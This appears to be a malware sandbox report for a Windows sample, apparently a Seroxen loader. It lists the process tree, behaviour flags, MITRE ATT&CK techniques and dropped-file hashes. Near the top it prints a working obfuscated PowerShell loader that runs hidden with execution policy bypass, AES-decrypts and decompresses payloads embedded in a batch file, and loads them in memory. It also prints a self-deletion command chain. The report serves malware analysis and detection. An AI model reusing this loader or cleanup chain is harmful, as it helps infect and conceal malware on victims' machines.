C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Uni.bat').Split([Environment]::NewLine);foreach ($faxqr in $ZxJef) { if ($faxqr.StartsWith('SEROXEN')) { $MyVZJ=$faxqr.Substring(7); break; }}$tSYrU=[string[]]$MyVZJ.Split('\');$WdICd=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[0])));$eFigo=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[1])));AHAKZ $eFigo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));AHAKZ $WdICd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{083f6f61-6484-4133-a362-b17632d51528}5⤵PID:468
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{567fb3f4-38e7-4fff-ba7e-f3044837f059}5⤵PID:2304
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{56036c12-67ef-4779-ae1e-1d44dab88094}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ef80b409-eb41-484d-bc2c-00a215e834ed}5⤵PID:5192
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{3227510f-f3d8-4a90-a861-7fa41af5bbbf}5⤵PID:3996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe" & exit5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:448 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:6016
-
-
C:\Windows\system32\PING.EXEPING localhost -n 86⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5164
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe"6⤵
- Kills process with taskkill
PID:4012
-
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe"6⤵
- Views/modifies file attributes
PID:5032
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3728
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3908
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4072
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4592
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3192
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2688
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2644
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4964
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:2296
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:5088
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:1964
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:1940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5940 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3872 -ip 38722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- System Location Discovery: System Language Discovery
PID:3388
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 5792 -ip 57922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5528
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 640 -p 4500 -ip 45002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2208 -ip 22082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- System Location Discovery: System Language Discovery
PID:184
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
1Hidden Window
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
42KB
MD5a3b466d4a6cc7f8e84c6d46d77d2d030
SHA13a26fd5d64b954aae60fd380efc3e6b73729b65e
SHA256825ad17e096c63594e8e79678c80016aed751506a7c076fb07530ec5175cee4b
SHA512c540915713e4dc22b0c9b68d6bf4063df932bb12ab2ed4f345e1ad7b9edc843ecf8e69d120829b66dad699b5fd7eec63c3ad41b9a93aa37e7bc1caa4cce1a534
-
Filesize
13KB
MD5611ae920398481de000c818385978282
SHA1d1bbe64411f3c20d5c054f4c1ffe31b2dc99b533
SHA256484f4b9524333ca8776551d24119b4b594014d9fa31a902a7f3b0a29862bda20
SHA512c4dd392f0a84f29913aeb63598a7cc28b9158674ee2024e2776316f4dc6476edc205812734619f7453e7d2194dd423fd087d230d3076214f1d8280cc5e32cbe7
-
Filesize
42KB
MD5dcf04dca77ffac648bd5c2e4f4103089
SHA1bb1fe1c1c1f57fad7e1b8bbfb54f97880133a5aa
SHA256c0756cd8709eb386e126c2ec2f09e011037add76abce628869d473307b229539
SHA512b2fc1707df31bf53d4bf8015bc921eb18edc7a81a59a5980762ecfb007d3c3e5613a7bd8cbf08bb674b853caf0a0376a71941d1ed5dd2f555c9e8074c573efa5
-
Filesize
13KB
MD5be169adba2b20fe02f45bd92f5414f5c
SHA18fcb0474e3def679c9adf1e36427a1b538415752
SHA256c4a297896a8cce39b651e1b05ed329d820b3466a903d6b70a37c544d1e99cdc5
SHA512331cdddc3a053e2ef84e67997c843e357d5cab20004c94e0938de5065ccf0d510b78c096c8271b4327c161fb8a33dffb2366058060444bb825b92c25a45b5aaf
-
Filesize
41KB
MD561eda2e288bb2379339fb9c498072634
SHA1e44c149bdca1ef87c2d430e90272c361fdaa3d58
SHA2561e801a7e645cbc27e23b296dbe492491d7156473f4f0f82266899fc54c02ea00
SHA51219f644847b96dbd115784fef038045b460fae7121b6a736dcfa518336f66bfadf041512ce56998bb13547a00d26711478e29f70c367fb5784f7b3d748be73ecb
-
Filesize
13KB
MD5a233914b006cf910d7397be38deed782
SHA147285810da0cd69afdfd5242cf24d87504dcb183
SHA2560fffc623d509e7dba72e1f552ddd971cfbb79794814f9f4f02896ee87f29d83b
SHA5124daf4a445287ec81dda42864dc4e12f60957548358bcf02d9514e862230ce801cc2c3532f135e46d5b9dcfc2e1f2b3ef7285321afaca1e28d236e3fd25f96a7f
-
Filesize
42KB
MD55789f3eb7f03afe807b1d04c619b0299
SHA126a427366eec672692cd5b6391aeedcf02d54e75
SHA2562beec560a0b83aba558df659a4dc49c5a8492913871f13567178aa58faad05f9
SHA5123f31f4613d753f607eb616b630925289f823e6bf87cac94f0bddd9e75e329095213a74b130b4fc8b6123940ca152b31c8b84027360a93f3e66bbba24ea223e15
-
Filesize
13KB
MD50096b1b2d609468dce5e09dd064bcbb6
SHA183736d2874cd94dbf41030d2911ed39a6abf8287
SHA256be20cb3b7237e52df92db1147fe1af3ee3f00d073de2d3e073187eca42d5fafa
SHA51263de6b0ef155bbce96ab54f3f7a02478b58d88cafa6807cdf7439a8755600cfd51286351ddc2584346e012cd2a49e0878a1bdcfafc6ef68b588a5f8bb40a3693
-
Filesize
12.5MB
MD5a4f9a8d05619cb7bcd36de94cce00098
SHA1fd23538b08c68e5b1229fb6cff001153842ebdad
SHA2566db8ff4761350cce286a0d448258b05bf0575c3a751b5a4efb6957ef691e167b
SHA5120ec6e105196b4ad72085b5e0a515620aabb7167a3932fcc0500ac34e184cabbf24a03242a7cbf66937e043ddd467aa5aa1cbe24a01f57a80b83376057805a809
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045